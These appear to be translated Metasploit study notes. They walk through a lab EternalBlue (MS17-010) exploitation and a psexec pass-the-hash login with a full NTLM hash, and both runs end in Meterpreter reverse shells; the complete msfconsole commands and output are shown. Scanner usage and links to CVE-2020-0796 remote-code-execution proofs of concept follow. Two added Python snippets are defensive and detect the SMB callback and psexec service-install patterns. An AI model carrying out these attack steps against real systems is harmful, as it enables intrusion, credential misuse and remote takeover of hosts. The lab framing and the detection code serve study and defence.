msfconsole attack and auxiliary modules (1)
msf demo
Exploit modules (module)
The framework provides functions of several kinds (exploit, auxiliary, and so on):
auxiliary   auxiliary scripts (scanning, sniffing, cracking, injection, exploit discovery) ---> reconnaissance, observation
exploits    vulnerability exploitation (the various attack scripts) ---> open the gate, based on what reconnaissance found
nops        evade intrusion detection devices (IDS) ---> if a guard is met while opening the gate, disguise and slip past
payloads    attack payloads (do the work inside the gate) ---> open the gate
evasion     build attack payloads --> build the infiltrator, matched to the target system and language
encoders    encoding and encryption (AV evasion) --> disguise the infiltrator to fool the guards inside the gate
post        post-exploitation commands --> raise the infiltrator's privileges and freedom of movement inside the gate
data        API interface --> the interface for calling msf functionality from your own programs
plugins     plugins
scripts     scripts
tools       miscellaneous tools
Attack payload (payload)
Think of it in terms of a server side and a client side:
for zabbix, for example, zabbix_client collects system information, obtains system privileges, opens service ports and so on, and reports back to the server side; the client itself is the attack payload.
It is the code we want the target system to execute after it has been exploited.
Shellcode (overflow code)
Active access:
one kind of attack payload; its job is to provide a window that can be interacted with.
Listener (listener)
Passively receives the client's connection.
Simulated attack walkthrough: ms17-010
Start the attack tool, msfconsole
```
# start the msf console ---> "enter the armory"
┌──(root㉿kali)-[/usr/share/metasploit-framework/modules]
└─# msfconsole
```
Once inside an exploit module, `show options` shows the option help.
```
# search for exploit modules targeting a published vulnerability ID ---- "size up the imaginary enemy and choose the weapon, e.g. the other side is an armoured column"
# returns the matching module name, disclosure date, rank, check support and description --- "match my own arsenal against the enemy situation: army aviation regiment, fighter squadron, howitzer battalion, ..."
msf6 > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

# select the exploit module ----> "the commander picks the weapon: use <number>"
msf6 > use 0
# enter the module's console   # "choose the weapon and payload, confirm the target, launch the attack"
# show options displays the global options, or the options of one or more modules
# each option has a name, current setting, required flag and description
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.0.9         yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target
```
```
# From the module and payload options, the key points are:
# 1. local machine: IP, port, exit technique
# 2. remote host: IP, port; the descriptions say the target must match the expected architecture and OS version
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.0.0.136
# set the remote host IP
# exploit commands:
#   check     test whether the target host is exploitable
#   recheck   re-run the check against the target host
#   reload    reload the module
#   rcheck    reload the module, then check the target host
#   run       launch the attack
#   exploit   launch the attack attempt
#   rexploit  reload the module, then launch the attack
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.0.0.9:4444
[*] 10.0.0.136:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.0.0.136:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 10.0.0.136:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.0.0.136:445 - The target is vulnerable.
[*] 10.0.0.136:445 - Connecting to target for exploitation.
[+] 10.0.0.136:445 - Connection established for exploitation.
[+] 10.0.0.136:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.0.0.136:445 - CORE raw buffer dump (38 bytes)
[*] 10.0.0.136:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 10.0.0.136:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 10.0.0.136:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 10.0.0.136:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.0.0.136:445 - Trying exploit with 12 Groom Allocations.
[*] 10.0.0.136:445 - Sending all but last fragment of exploit packet
[*] 10.0.0.136:445 - Starting non-paged pool grooming
[+] 10.0.0.136:445 - Sending SMBv2 buffers
[+] 10.0.0.136:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.0.0.136:445 - Sending final SMBv2 buffers.
[*] 10.0.0.136:445 - Sending last fragment of exploit packet!
[*] 10.0.0.136:445 - Receiving response from exploit packet
[+] 10.0.0.136:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.0.0.136:445 - Sending egg to corrupted connection.
[*] 10.0.0.136:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 10.0.0.136
[+] 10.0.0.136:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.0.136:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.0.136:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 1 opened (10.0.0.9:4444 -> 10.0.0.136:49218 ) at 2022-06-07 11:26:55 +0800
meterpreter >
meterpreter > quit   # exit the session
# exploitation of the host is complete
```
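A defender-side view of the run above, added here as an example and not part of the original notes: the exploit shows up on the wire as inbound SMB (port 445) connections from the attacking machine, followed seconds later by the victim opening a connection back to the attacker's handler (10.0.0.9:4444 above). The firewall-style log lines below are constructed, with an assumed format `<epoch> <src>:<port> -> <dst>:<port> <proto>`, and the function flags any host that calls back to an SMB peer on a non-SMB port within a short window.

```python
import re
from collections import defaultdict

# Assumed log format for this example: "<epoch> <src_ip>:<src_port> -> <dst_ip>:<dst_port> <proto>"
LINE_RE = re.compile(
    r"^(?P<ts>\d+) (?P<sip>[\d.]+):(?P<sport>\d+) -> (?P<dip>[\d.]+):(?P<dport>\d+) (?P<proto>\w+)$"
)


def parse(line):
    """Parse one connection-log line into a dict, or None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    return {"ts": int(d["ts"]), "sip": d["sip"], "sport": int(d["sport"]),
            "dip": d["dip"], "dport": int(d["dport"]), "proto": d["proto"]}


def find_smb_reverse_shell(lines, window=60):
    """Return (victim, peer, reverse_port) for every host that accepted SMB from a peer
    and then connected back to that same peer on a non-SMB port within `window` seconds."""
    smb_inbound = defaultdict(list)  # (victim, peer) -> timestamps of inbound 445 connections
    hits = []
    for rec in filter(None, map(parse, lines)):
        if rec["proto"] != "tcp":
            continue
        if rec["dport"] == 445:
            smb_inbound[(rec["dip"], rec["sip"])].append(rec["ts"])
            continue
        # any other outbound connection: did this host recently receive SMB from the destination?
        for t in smb_inbound.get((rec["sip"], rec["dip"]), []):
            if 0 <= rec["ts"] - t <= window:
                hits.append((rec["sip"], rec["dip"], rec["dport"]))
                break
    return hits


# Constructed sample log (not captured from the original page): two SMB connections from
# 10.0.0.9 to 10.0.0.136, then 10.0.0.136 calling back to 10.0.0.9:4444, plus benign noise.
SAMPLE_LOG = """\
1654571200 10.0.0.9:51234 -> 10.0.0.136:445 tcp
1654571201 10.0.0.9:51235 -> 10.0.0.136:445 tcp
1654571214 10.0.0.136:49218 -> 10.0.0.9:4444 tcp
1654571300 10.0.0.20:50000 -> 10.0.0.136:445 tcp
1654571310 10.0.0.136:49300 -> 10.0.0.50:443 tcp
""".splitlines()

if __name__ == "__main__":
    for victim, peer, port in find_smb_reverse_shell(SAMPLE_LOG):
        print(f"possible exploit + reverse shell: {victim} -> {peer}:{port}")
```

The heuristic keys on the call-back to the same peer rather than on port 4444, since the handler port is just an option (LPORT) and is easily changed.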
exploit/windows/smb/psexec: using the user's password hash
Different exploit modules yield different levels of system privilege; the user's password can only be obtained in hashed (ciphertext) form.
```
# select the exploit module
msf6 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/psexec
# set the attack parameters
msf6 exploit(windows/smb/psexec) > options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting                                                    Required  Description
   ----                  ---------------                                                    --------  -----------
   RHOSTS                10.0.0.136                                                         yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT                 445                                                                yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                                                                      no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                                                     no        The service display name
   SERVICE_NAME                                                                             no        The service name
   SMBDomain             .                                                                  no        The Windows domain to use for authentication
   SMBPass               aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4  no        The password for the specified username
   SMBSHARE                                                                                 no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBUser               administrator                                                      no        The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.0.9         yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

# start exploitation
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 10.0.0.9:4444
[*] 10.0.0.136:445 - Connecting to the server...
[*] 10.0.0.136:445 - Authenticating to 10.0.0.136:445 as user 'administrator'...
[*] 10.0.0.136:445 - Selecting PowerShell target
[*] 10.0.0.136:445 - Executing the payload...
[+] 10.0.0.136:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to 10.0.0.136
[*] Meterpreter session 9 opened (10.0.0.9:4444 -> 10.0.0.136:54635 ) at 2022-06-09 16:07:16 +0800
meterpreter >   # exploitation complete
```
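The psexec run above authenticates over the network with the user's NTLM hash and then starts a service on the target (the module chose its PowerShell target). Added example, not from the original notes: it correlates constructed Windows events, a 4624 logon (type 3, NTLM) followed within 30 seconds by a 7045 service install whose image path is a cmd/powershell one-liner, and returns the matching pairs. The event field names follow the real 4624 and 7045 events, but the sample values are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events: (timestamp, event id, selected fields).
# 4624 = account logon (Security log); 7045 = new service installed (System log).
SAMPLE_EVENTS = [
    ("2022-06-09T16:07:10", 4624, {"LogonType": "3", "AuthenticationPackageName": "NTLM",
                                  "TargetUserName": "administrator", "IpAddress": "10.0.0.9"}),
    ("2022-06-09T16:07:12", 7045, {"ServiceName": "qWxYzTuV",
                                  "ImagePath": "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e QUFBQQ=="}),
    ("2022-06-09T16:30:00", 4624, {"LogonType": "2", "AuthenticationPackageName": "Negotiate",
                                  "TargetUserName": "alice", "IpAddress": "-"}),
    ("2022-06-09T16:31:00", 7045, {"ServiceName": "Spooler",
                                  "ImagePath": r"C:\Windows\System32\spoolsv.exe"}),
]

# A service "binary" that is really a cmd/powershell one-liner (encoded command or /c).
SUSPICIOUS_IMAGE = re.compile(
    r"(powershell|cmd\.exe|%COMSPEC%).*(\s-e(nc\w*)?\s|\s/c\s)", re.IGNORECASE)


def is_ntlm_network_logon(event_id, fields):
    """True for a 4624 network logon (type 3) authenticated with NTLM, which is what a hash login looks like."""
    return (event_id == 4624 and fields.get("LogonType") == "3"
            and fields.get("AuthenticationPackageName") == "NTLM")


def correlate_psexec(events, window_s=30):
    """Return (logon_time, source_ip, user, service_name) for every suspicious service
    install that follows an NTLM network logon within window_s seconds."""
    recent_logons = []
    hits = []
    for ts, eid, fields in sorted(events, key=lambda e: e[0]):
        t = datetime.fromisoformat(ts)
        if is_ntlm_network_logon(eid, fields):
            recent_logons.append((t, fields["IpAddress"], fields["TargetUserName"]))
        elif eid == 7045 and SUSPICIOUS_IMAGE.search(fields.get("ImagePath", "")):
            for lt, ip, user in recent_logons:
                if timedelta(0) <= t - lt <= timedelta(seconds=window_s):
                    hits.append((lt.isoformat(), ip, user, fields["ServiceName"]))
    return hits


if __name__ == "__main__":
    for hit in correlate_psexec(SAMPLE_EVENTS):
        print("possible hash-based logon + remote service execution:", hit)
```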
msfconsole auxiliary functions
The built-in scanners are not especially powerful; for system scanning and web scanning, dedicated tools such as Nessus, AWVS, 天境, 极光 and so on are normally used.
They can still serve as a reference during information gathering.
whois command
nmap command
  syn scan
  tcp scan
  icmp, etc.
The focus here is the scanning functions.
smb version
```
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 10.0.0.136:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:2d 3h 9m 35s) }) (authentication domain:123-PC)
[+] 10.0.0.136:445 - Host is running Windows 7 Ultimate SP1 (build:7601) (name:123-PC) (workgroup:WORKGROUP)
```
ssh version
```
msf6 auxiliary(scanner/ssh/ssh_version) > run
[+] 10.0.0.1:59783 - SSH server version: SSH-2.0-OpenSSH_7.4 ( service.version=7.4 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:7.4 service.protocol=ssh fingerprint_db=ssh.banner )
```
ftp version
CVE-2020-0796, EternalBlue 2.0
Affects Windows 10 versions 1903 and 1909
https://github.com/ly4k/SMBGhost # scanner that checks whether the vulnerability is present
https://github.com/danigargu/CVE-2020-0796 # obtains a shell
https://github.com/ZecOps/CVE-2020-0796-RCE-POC # obtains